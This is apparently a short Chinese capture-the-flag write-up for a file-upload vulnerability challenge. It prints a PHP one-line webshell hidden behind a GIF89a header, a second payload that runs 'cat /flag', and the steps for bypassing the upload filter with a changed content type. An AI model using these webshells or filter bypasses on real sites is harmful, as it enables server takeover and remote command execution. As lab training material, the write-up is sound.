简单的文件上传漏洞题目
题目要求上传图片那我们就考虑上传一个phtml文件,然后抓包改下上传文件的类型
将里面的内容改为一句话木马,为我们后面的蚁剑连接做准备
GIF89a
<script language="php">eval($_POST['hhz']);</script>
上面的头是gif的文件头,用来对应对文件的扫描
我们将它上传,使用bp截取,修改一下格式(image/jpeg),再放行
然后直接蚁剑连接就好了,文件应该保存在http://f9c87aea-a976-43d2-af3c-911df1363459.node4.buuoj.cn:81/upload/shell.phtml
所以我们也是直接连接这个网站
也可以用cat /flag的一句话木马 <script language='php'>system('cat /flag');</script>
这样直接打开那个保存的网站就可以直接得到flag